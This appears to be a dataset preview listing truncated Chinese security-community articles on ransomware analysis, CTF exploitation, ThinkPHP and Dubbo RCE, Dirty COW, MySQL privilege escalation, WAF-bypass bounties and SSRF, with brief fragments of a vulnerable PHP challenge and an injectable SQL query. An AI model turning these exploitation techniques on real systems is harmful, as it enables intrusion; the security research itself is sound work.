|
##### 译文声明
本文是翻译文章,文章来源:fortinet.com
原文地址:<http://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[an0nym0u5](http://bobao.360.cn/member/contribute?uid=578844650)
预估稿费:160RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**引子**
****
在过... | 社区文章 |
# 针对vk.com的恶意软件仍在Google Play上肆意妄行
##### 译文声明
本文是翻译文章,文章原作者 Roman Unuchek,文章来源:securelist.com
原文地址:<https://securelist.com/still-stealing/83343/>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
2015年10月,我们发表了一篇[博文](https://securelist.com/stealing-to-the-sound-of-music/72458/)介绍通过Google Play商店传播的一款流行的恶意软件。在接下来的两年中,我们在Google
Play上陆续检查到了几款... | 社区文章 |
偶尔会收到邮件、微博还有博客来咨询,说在代码审计的时候总感觉程序比较乱,读不懂框架,理不清思路,发现了一段漏洞代码,但是不知道怎么去找到漏洞利用点(请求哪个URL、提交什么数据),这是因为你对这套程序的大框架还不够熟悉,对程序执行流程理解不透彻。
既然这么多人反馈,那我就简单说一下我的方式: **利用思维导图** 。
思维导图是个很好的东西,我在思考各种事情、写复杂程序等等各种场景都会用上这个东西,当然代码审计的时候也会用到,因为它能帮我很快熟悉框架,并且记录可能出现安全问题的地方。如下图所示
这是在审计禅道时弄的一个简单思维导图,禅道这套系统一共审计出来了几十个漏洞利用点,包括免登录注入和getshell。
可以看到我的这个思维导... | 社区文章 |
# 0CTF 2019 zero_task条件竞争利用
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 1.前言
0CTF2019 pwn题zerotask,难度在pwn题里最低,漏洞类型条件竞争。
## 2.题目保护
全保护开启
## 3.题目功能
题目实现了一个加密解密的功能,共有三个功能项。
1.创建任务 2.删除任务 3.执行任务
### a.创建任务
该功能创建一个0x80大小的结构体。暂时命名为task
task{+0x00, data +0x08, data_size
+0x14 ,KEY +0x34 IV
……..
+0x58 EVP_CIPHER_CTX ... | 社区文章 |
#### Author: elknot@360corpsec
* * *
## 0x00 前言
其实这篇文章在昨天构思的时候就已经想到了,但是为什么过段时间才放出来,是因为看到了b1z0n大佬写的那篇文章,于是准备把这篇文章的结构完善一下然后写出来。
其实上篇文章在基础设施威胁情报里面,我们干的事情很大一部分都是在将资产与威胁情报结合来看,那么这么做,实际上是为了怕一种情况而来——突发的信息安全事件,这个事件可能是比较大规模的公共类型事件,也可能是小规模爆发黑产性质的事件,前者的最佳案例就是上半年WannaCry肆虐全球,后者最佳案例就是12月底的Weblogic挖矿事件。换句话说,事件情报实际上就是为了迅速确定事件对我方的影响... | 社区文章 |
## 前言
最近参加了两个CTF比赛,都遇到了无参数RCE的问题。第一次遇到虽然没解出来,但是为第二次比赛遇到做了基础铺垫,第二次也迎刃而解,同时这次比赛也学到了很多fuzz的方法和思路,在这里做个总结。
## 题目
<?php
highlight_file(__FILE__);
$code = $_GET['code'];
if (!empty($code)) {
if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
if (preg_match('/readfile|i... | 社区文章 |
# 基于打印机跳板技术的新型C2及其检测方法(上篇)
|
##### 译文声明
本文是翻译文章,文章原作者 Alfie Champion, James Coote,文章来源:labs.f-secure.com
原文地址:<https://labs.f-secure.com/blog/print-c2/>
译文仅供参考,具体内容表达以及含义原文为准。
在本文中,我们将为读者介绍基于打印机跳板技术的新型C2及其检测方法。
## 引言
在本文中,我们不仅会为读者详细介绍基于打印作业的新型Command &
Control(C2)的工作原理,以及基于C3的打印通道的实现方法;同时,我们还探讨了与这种技术相关的OPSEC事项,并概述了相关的检... | 社区文章 |
# TCTF 2021 0bf - 利用Unicorn模拟被混淆的代码
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 简介
这次的TCTF 2021 Final有队友们的鼎力相助,拿了Rising
Star的冠军,十分刺激。其中收获比较大的是`0bf`这道题目,这是一个10轮的加密算法,代码有大量混淆,加密逻辑没法直观地看出来。赛后官方的writeup是去混淆再解,但在比赛时没有足够的时间来研究混淆的规律,只能硬着头皮分析。这道题目也是我第一次用Unicorn来模拟函数逻辑,收获还是很大。
## 程序逻辑
由于代码经过了混淆,函数严重膨胀,首先要修改IDA的配置文件,将函数大小的上限调... | 社区文章 |
#### 简介 :
之前做过一道CTF的题目( 还是 facebook 的一个漏洞 ? ) , 具体是什么比赛忘记了
那个题目大概是让用户上传一个 tar 压缩包 , 然后会将其中的 txt 文件的内容显示出来
正解是先本地创建一个符号链接指向某一个敏感文件的绝对路径 (/etc/passwd)
然后使用 tar 打包后上传给具有漏洞的程序 , 然后 , 经过程序处理以后就会 follow 符号链接将文件内容显示出来
这个漏洞大概也如此
在审计和测试 Codiad 这个开源程序的时候 , Codiad 开发者自己维护了一个用于展示 Codiad Demo 的网站
> demo.codiad.com
测试的时候使用... | 社区文章 |
**作者:启明星辰ADLab
公众号:<https://mp.weixin.qq.com/s/DGWuSdB2DvJszom0C_dkoQ>**
### **漏洞介绍**
2019年1月11日,ThinkPHP团队发布了一个补丁更新,修复了一处由于不安全的动态函数调用导致的远程代码执行漏洞。该漏洞危害程度非常高,默认条件下即可执行远程代码。启明星辰ADLab安全研究员对ThinkPHP的多个版本进行源码分析和验证后,确认具体受影响的版本为ThinkPHP5.0-5.0.23完整版。
### **漏洞复现**
本地环境采用ThinkPHP 5.0.22完整版+PHP5.5.38+Apache进行复现。安装环境后执行POC即可执行系... | 社区文章 |
### 摘要
自互联网诞生以来消息聊天应用就已存在。随着一些国家对通信应用进行大规模监控,更多的用户安装了“安全通讯”之类的端到端加密应用程序。这些应用声称可以加密用户的邮件,并保护其内容免受任何第三方的侵害。
然而,在深入研究其中的三个安全消息传递应用程序(Telegram,WhatsApp和Signal)之后,我们发现这些安全服务可能无法像他们所承诺的那样保护用户的隐私。
对于用户来说,他们下载这些应用的目的就是希望应用能对他们的照片、消息等隐私进行保护,所以这个消息无疑对用户来说是十分严重的。对于这些应用程序来说,他们无法假设使用用户受过安全的教育,并对设备上的某些设置所带来的风险十分了解。因此,应用厂商有义务向用户解释应用中... | 社区文章 |
### 0x01 前言
> [Niushop B2C](https://www.niushop.com.cn/ "Niushop
> B2C")商城系统基于[ThinkPHP](http://www.thinkphp.cn/
> "ThinkPHP")5.0开发,源码全部开放(100%),商用免费,四网合一,满足用户、企业、开发者、服务商等角色要求
### 0x02 代码分析
跟踪到 **/Application/(wap/shop)/Controller/Goods.php** 中的 **promotionZone** 方法
* 1337 Line: 判断是否是ajax请求
* 1338 Line: 获取get参数为p... | 社区文章 |
# 【技术分享】CVE-2016-6662:Mysql远程代码执行/权限提升技术分析正式版(9/13 10:47更新)
|
##### 译文声明
本文是翻译文章,文章来源:安全客
原文地址:<http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html>
译文仅供参考,具体内容表达以及含义原文为准。
作者:[苦逼司马](http://bobao.360.cn/member/contribute?uid=116160120)(凌晨四点收到投稿,感谢作者连夜编辑技术分析)
稿费:800RMB
投... | 社区文章 |
SELECT * FROM `qs_personal_focus_company` WHERE MATCH (`company_id`) AGAINST ("aaa");
目前的情况:以上代码aaa参数可控造成的显错注入,但是MATCH..AGAINST需要company_id的属性为fulltext,不然会报错如下图。
当构造语句执行数据库内置函数的时候,是可以优先报错内置函数的(version,database(),user())。
SELECT * FROM `qs_personal_focus_company` WHERE MATCH (`company_id`) AGAINST ("aaa") and update... | 社区文章 |
# 使用afl对CS:GO进行模糊测试
在RealWorldCTF2018中有一个非常有意思的题叫“P90 Rush
B”,名字本意是说在Valve的游戏“CS:GO”中的一种极限战术。这个题主要是考挖掘和利用CS:GO游戏服务器中地图文件加载部分的一个漏洞。在CTF期间,我利用了一个另外一个队伍在[writeup](https://blog.perfect.blue/P90_Rush_B)中提到的一个栈溢出漏洞。
因为这个漏洞影响了CS:GO官方的windows客户端,所以其实是可以有资格被Valve的漏洞赏金程序接受的,其实这个洞是[以前一个报告](https://hackerone.com/reports/351014)的一个... | 社区文章 |
# 0x00:前言
本文从2019UNCTF里的一道有意思的逆向题目 **奇妙的RTF**
入手,对Office2017年的CVE-2017-11882进行调试分析,题目文件我放在附件中,需要的师傅可以下载学习,如果你完全不懂Office漏洞,这篇文章还是可以帮助你打开Office漏洞的面纱,首先我会讲一下身为一个完全不懂office的人如何做出这道题目的,然后在对漏洞的Poc本身进行分析,其原理十分简单,本文的调试环境是
* Windows 7 x64 sp1
* Office 2007 Professional
# 0x01:奇妙的RTF
首先题目给我们一个压缩包,解压之后提示我们用Office打开,既然是2017年的,... | 社区文章 |
# 【知识】8月29日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要: WireX DDoS僵尸网络: 大量被黑Android智能设备构成的DDoS之军、Adwind:
一个跨平台的远控工具(RAT)、Sarahah app 泄露用户隐私、安卓DDOS僵尸网络:The WireX
Botnet、大量android恶意软件样本集、安全相关的优秀演讲集合、Domain
Analyzer:自动发现并报告与给定域名相关的信息、Web安全学习资料汇总**
**资讯类:**
WireX DDoS僵尸网络: 大量被黑Android智能设备构成的DDoS... | 社区文章 |
翻译自: <https://medium.com/@prasincs/open-source-static-analysis-for-security-in-2018-part-3-go-8018507568bb>
翻译:聂心明
在过去三年里,我一直用GO做全职开发,期间只休息了一小段时间。我非常喜欢这个语言,因为它有很好的系统类型,安全,支持并发高和我不断处理的性能问题。我最喜欢的关于Go一件事情就是如何轻松的给他写一个工具,和有多少社会会支持它(
<https://blog.cloudflare.com/building-the-simplest-go-static-analysis-tool/>
)。它对各种开发环境都... | 社区文章 |
目前已发放出去3W多奖金!
2017-9-8:福利增加:月即日起提交通过审核量超过 200,或者周提交通过审核量超过 80, 送 DNSLOG账号一枚,一个账号只有1次获得机会。
DNSLOG文章:<https://xianzhi.aliyun.com/forum/read/384.html>
\-----------------------------------------------------------现在急需找一些大牛们来完善一些漏洞信息(数量有限),
完善漏洞根据提交的内容和字段数,会给予一定的现金奖励(0-100)
有意者私聊我,或者群里找我(群号:237788572)。
建议都加入钉钉群(群里任... | 社区文章 |
# 前言
我们知道一些游戏为了防止被分析会加入反调试的代码,那么我们的木马样本同样也需要用到反调试技术。攻和防其实是相对的,只有了解了调试的原理,才能更深入的进行对抗,本文就对一些常见的反调试手段进行总结并对深层原理进行探究。
# 调用API
## NtGlobalFlag
在 32 位机器上,`NtGlobalFlag`字段位于`PEB`的`0x68`的偏移处,64 位机器则是在偏移`0xBC`位置,该字段的默认值为
0。当调试器正在运行时,该字段会被设置为一个特定的值
该字段包含有一系列的标志位,由调试器创建的进程会设置以下标志位:
FLG_HEAP_ENABLE_TAIL_CHECK (0x10)
FLG_HE... | 社区文章 |
# 卡巴斯基——2019上半年金融威胁报告
|
##### 译文声明
本文是翻译文章,文章原作者 securelist,文章来源:securelist.com
原文地址:<https://securelist.com/financial-threats-in-h1-2019/91899/>
译文仅供参考,具体内容表达以及含义原文为准。
## 引言
卡巴斯基报告中的金融威胁是指主要针对在线银行、电子货币、加密货币等服务的用户的恶意程序,以及试图入侵金融机构及其基础设施的威胁。为了研究针对金融行业的威胁图景,卡巴斯基研究人员分析了卡巴斯基用户遭遇的恶意活动案例。为了跟踪恶意软件的发展趋势,这些数据被与2018年的相同时期进行比较。卡巴斯... | 社区文章 |
# CVE-2019-11270:Cloud Foundry UAA中的提权漏洞分析
|
##### 译文声明
本文是翻译文章,文章原作者 twistlock,文章来源:twistlock.com
原文地址:<https://www.twistlock.com/labs-blog/privilege-escalation-in-cloud-foundry-uaa-cve-2019-11270/>
译文仅供参考,具体内容表达以及含义原文为准。
4月份,我向`Cloud Foundry`安全团队披露了[Cloud Foundry
UAA](https://docs.cloudfoundry.org/concepts/architectu... | 社区文章 |
## Dubbo多个远程代码执行漏洞
马上年底了,发现年初定的几个漏洞的KPI还没来得及完成,趁着最近有空赶紧突击一波,之前业务部门被爆过Dubbo的漏洞,干脆就把Dubbo拖过来挖一把。之前没用过Dubbo,既然要挖它就先大体了解了一下,毕竟know
it and then hack
it。Dubbo是个基于Java的RPC框架,可以实现Java过程的远程调用。话不多说,先本地搞个Demo跑起来看看,Dubbo版本就采用最新的2.7.8。
### 本地Demo
先从Git地址<https://github.com/apache/dubbo-samples>
上下载示例项目,里面有几十个示例,我们随意选取一个dubbo-sample... | 社区文章 |
# 【技术分享】使用AT调制解调器命令解锁LG Android屏幕
|
##### 译文声明
本文是翻译文章,文章来源:articles.forensicfocus.com
原文地址:<https://articles.forensicfocus.com/2017/02/03/unlocking-the-screen-of-an-lg-android-smartphone-with-at-modem-commands/>
译文仅供参考,具体内容表达以及含义原文为准。
翻译:[胖胖秦](http://bobao.360.cn/member/contribute?uid=353915284)
预估稿费:100RMB
投稿方式:发送邮件至... | 社区文章 |
测试环境:fk.aliyundemo.com/sqli1/waf.php
Post注入点,通过注入点读取出用户密码判定为有效。
奖励标准:每个不重复绕过方案奖励1000元。
相同的绕过方案,以最先提交者为准。
20170925 更新:漏洞在审核中,目前看到后面提交的绕过方案,基本都重复了。可以看一下标题的提示,尝试使用“非规则”绕过方案绕过,避免重复漏洞。 | 社区文章 |
### 一. 漏洞概述
2016年10月18日,黑客Phil Oester提交了隐藏长达9年之久的“脏牛漏洞(Dirty
COW)”0day漏洞,2016年10月20日,Linux内核团队成员、Linux的创始人Linus修复了这个
0day漏洞,该漏洞是Linux内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞,导致可以破坏私有只读内存映射。黑客可以获取低权限的本地用户后,利用此漏洞获取其他只读内存映射的写权限,进一步获取root权限。
针对该漏洞阿里云安全团队在第一时间对该漏洞进行了详细的技术分析,具体详情见“第二章节 漏洞分析”内容。
### 二. 漏洞基本信息
**漏洞编号:** CVE-201... | 社区文章 |
# 【安全科普】Web安全之浅析命令注入
##### 译文声明
本文是翻译文章,文章来源:hackerone.com
原文地址:<https://www.hackerone.com/blog/how-to-command-injections>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[LeagerL](http://bobao.360.cn/member/contribute?uid=2942089324)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
命令注入是指攻击者可以能够控制操作系统上执行的命令的一类漏洞。 这篇文章将会讨论它的影响,包括如何测试它 ,绕过补丁和... | 社区文章 |
## 收集信息
发现
.project文件 sql目录遍历 uploads目录遍历 phpmyadmin泄露 superadmin 目录(phpmywind)泄露
include目录遍历
### 获取到管理员密码
首先看sql目录
下载后发现是sql的导出文件,有php版本 phpstudy 查看一些信息发现
somd5解出来密码是rock1980
### 登陆phpMyadmin
尝试admin rock1980登陆phpwind phpmyadmin未果,用root rock1980登陆phpmyadmin,成功登陆
secure_file_priv设置为NULL,写日志文件又不知道web绝对路径写不了shell... | 社区文章 |
# 利用Ubuntu的错误报告功能实现本地提权(LPE)part4
|
##### 译文声明
本文是翻译文章,文章原作者 github,文章来源:securitylab.github.com
原文地址:<https://securitylab.github.com/research/ubuntu-whoopsie-CVE-2019-11484>
译文仅供参考,具体内容表达以及含义原文为准。
这篇文章中,我将重点介绍whoopsie CVE-2019-11484,一个导致堆溢出的整数溢出漏洞。为了成功实现exploit
,我需要使用之前文章中介绍过的漏洞,用来获取whoopsie的ASLR偏移量。通过这两个漏洞,我可以用whoopsi... | 社区文章 |
# 前言
Schneider Electric Modbus Serial Driver 会监听 27700 端口,程序在处理客户端发送的数据时会导致栈溢出。
测试环境: windows xp sp3
相关文件链接
链接:https://pan.baidu.com/s/1d_-WT6gUJmbnJ8cRfCNl1g
提取码:qnpb
# 漏洞分析
下载安装程序,安装完成后,程序会监听 27700 端口
可以看到监听端口的进程名为 `ModbusDrv.exe` , 把它拿 `IDA` 打开进行后续分析。
## 定位协议处理代码
对于 `TCP` 服务端程序来说,接收数据一般是用 `recv` 函数,所以在分析未知协... | 社区文章 |
基于栈的 VM 题,单纯从指令来讲并不难,只需要简单的解析一下即可分析出进行的运算,但是运算上的一些小细节加大了本题的难度。
## Analysis
main 函数没有太多的内容,主要是获取输入之后传入 vm 进行运算
运算出来的结果和正确的进行逐字节的对比
进入 vm ,程序根据指令调用不同的函数,共 19 种不同的函数
根据汇编和调试很容易看出来每一个函数的作用,可以写一个简单的 python 脚本用来分析
while i < len(opcodes):
if opcodes[i] == 0:
print(hex(i)[2:].rjust(3, '0'), "inplace_add... | 社区文章 |
# 分析Avira VPN的两处提权漏洞
|
##### 译文声明
本文是翻译文章,文章原作者 enigma0x3.net,文章来源:enigma0x3.net
原文地址:<https://enigma0x3.net/2019/03/20/avira-vpn-2-15-2-28160-elevation-of-privilege-through-insecure-update-location/>
译文仅供参考,具体内容表达以及含义原文为准。
## 提权漏洞一
### 测试环境
* 软件版本:Avira Phantom VPN version 2.15.2.28160
* 下载链接:<https://package.avi... | 社区文章 |
# 360权威发布《2020上半年中国手机安全状况报告》
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
近日,基于2020年上半年手机安全数据,360安全大脑与中国信通院联合发布《2020上半年手机安全状况报告》。报告立足新冠疫情的大背景,从恶意程序、钓鱼网站、骚扰电话、垃圾短信及手机诈骗五大维度,系统地解读了当下国内手机用户面临的信息安全问题。
## 看小电影,丢大钱!
### 恶意程序中,资费消耗类占八成!色情视频APP为主要“工具”
2020年上半年度,360安全大脑共截获移动端新增恶意程序样本约104.8万个,平均每天截获新增手机恶意程序样本约0.6万个。其中,资费消耗类占比82.0%。... | 社区文章 |
# 深入分析MikroTik RouterOS CVE-2018-14847 & Get bash shell
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
**作者:** **icematcha**
## 0x01. 前言
MikroTik路由器在4月份被发现存在目录遍历漏洞CVE-2018-14847,危险程度为中。Tenable
Research的专家于10月7日在DerbyCon上发表了题为“Bug Hunting in
RouterOS”的演讲,介绍了这项新技术,就是利用该漏洞。目前结合该漏洞的黑客工具已放出,运行RouterOS的MikroTik设备成为恶意代码的目标。
本文从Mik... | 社区文章 |
# 【技术分享】看我如何黑掉基于ZigBee的IoT设备(含演示视频)
##### 译文声明
本文是翻译文章,文章来源:attify.com
原文地址:<http://blog.attify.com/2017/04/24/hack-iot-devices-zigbee-sniffing-exploitation/>
译文仅供参考,具体内容表达以及含义原文为准。
****
翻译:[ **興趣使然的小胃**](http://bobao.360.cn/member/contribute?uid=2819002922)
**预估稿费:200RMB**
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
*... | 社区文章 |
#### 作者:Zery
本文只代表个人见解,不代表任立场,如果您认为我的想法是错的那很正常,因为这是我的想法,如果您觉得您的想法和我一样,那我们就是传说中的
"激友"(对生活冲满激情的朋友)。进入正题
### 一 我心中的博客
我所以指的写博客,不单只是写一篇文章出来这一结果。而应该是写的这一过程,写过技术文章的朋友应该跟我一样有这么一个过程。
**1** 自己了解学习,文章所涉及到的知识点,及知识点衍生出来的知识点。
**2** 对学习的知识点进行验证,以确保理论值与实践值保持一致
**3** 构思文章的大纲,哪些部分需要重点写,需要配合实例代码,图片等信息
**4** 动手写,写完后再次检查校正并排版,然后发表
**5** 针... | 社区文章 |
# 0x 01 简介
最近自己写的小工具在扫描的过程,发现了某公司在公网开放了一个使用开源系统的站点,该系统为
[Splash](https://github.com/scrapinghub/splash),是一个使用 Python3、Twisted 和 QT5写的
javascript rendering service,即提供了HTTP API 的轻量级浏览器,默认监听在 8050 (http) 和 5023
(telnet) 端口。
Splash 可以根据用户提供的url来渲染页面,并且url没有验证,因此可导致SSRF (带回显)。和一般的 SSRF 不同的是,除了 `GET`
请求之外,Splash还支持 `POST`。这... | 社区文章 |
# FaceBook的存储型XSS漏洞
|
##### 译文声明
本文是翻译文章,文章原作者 default_user,文章来源:opnsec.com
原文地址:<https://opnsec.com/2018/03/stored-xss-on-facebook/>
译文仅供参考,具体内容表达以及含义原文为准。
## 介绍
我在2017年4月报告了多个FaceBook
wall上的存储型XSS。这些存储型XSS漏洞也出现在WordPress中,所以我在发布这篇文章之前等待WordPress进行修补。这些漏洞现已在WordPress上修复!
这些XSS有点复杂,因为它们需要多个步骤,但是每一步本身都很容易理解。
## Open Gra... | 社区文章 |
# v8漏洞学习之cve-2020-16040
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
最近学习了zer0con2021中的chrome exploitation议题,收获很大,在这里做一个简单的总结。
## poc
我们这里先简单放一个分析漏洞时使用的poc,下面的分析过程默认都使用了该代码。
function foo(a) {
var y = 0x7fffffff;
if (a == NaN) y = NaN;
if (a) y = -1;
let z = y + 1;
z >>= 31;
z = 0x... | 社区文章 |
**作者:xxhzz@星阑科技PortalLab
原文链接:<https://mp.weixin.qq.com/s/zGDZeG3_lz5IdJ-V4zZjhg>**
## **项目介绍**
Bonitasoft 是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita
是一个用于业务流程自动化和优化的开源和可扩展平台。
## **漏洞描述**
在Bonitasoft Authorization漏洞版本,由于 API 授权过滤器中配置问题,通过精心构造的的字符串附加到 API
URL,能够绕过权限认证。拥有普通用户权限的攻击者在绕过权限认证后,将恶意代码部署到服务器上,进行远程代码执行。
## ... | 社区文章 |
**作者:1mperio@云鼎实验室
原文链接:<https://mp.weixin.qq.com/s/FQdNaLduPX4jZBKluOqFOA>**
## 0x01 背景
国外安全研究员[champtar](https://github.com/champtar)在日常使用中发现Kubernetes
tmpfs挂载存在逃逸现象,研究后发现runC存在条件竞争漏洞,可以导致挂载逃逸。
关于条件竞争TOCTOU和一些linux文件基础知识可见这篇文章[《初探文件路径条件竞争 -TOCTOU&CVE-2019-18276》](http://whip1ash.cn/2021/06/16/toctou/)。
CVE-2021-304... | 社区文章 |
# 【工具分享】moloch:网络流量回溯分析系统
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
**
**
**0x01 故事背景**
某一天的早上,你怀着愉快的心情来到公司,开始美好的一天工作生活。有个业务后台的同事找到你说
昨天下班后有人反馈说访问他的业务后台有问题,他想分析网络层面的数据包看看,是否能看出什么问题。你微微一笑,作为一个资深网工,抓包这种小事,这不是正是花式秀tcpdump还是tshark的时候么?
突然又觉得那里不对…什么鬼?要抓昨天晚上的数据包,你突然想到的竟然是这货…
既然没有这么逆天的技能的时光鸡小伙伴 那还是搭建一个流量回溯系统吧... | 社区文章 |
# 安卓漏洞 CVE 2017-13287 复现分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
2018年4月,Android安全公告公布了CVE-2017-13287漏洞。与同期披露的其他漏洞一起,同属于框架中Parcelable对象的写入(序列化)与读出(反序列化)的不一致所造成的漏洞。在刚看到谷歌对于漏洞给出的[补丁](https://android.googlesource.com/platform/frameworks/base/+/09ba8fdffd9c8d74fdc6bfb51bcebc27fc43884a%5E%21/)时一头雾水,
在这里要感谢heeeeen[@MS50... | 社区文章 |
Subsets and Splits
Top 100 EPUB Books
This query retrieves a limited set of raw data entries that belong to the 'epub_books' category, offering only basic filtering without deeper insights.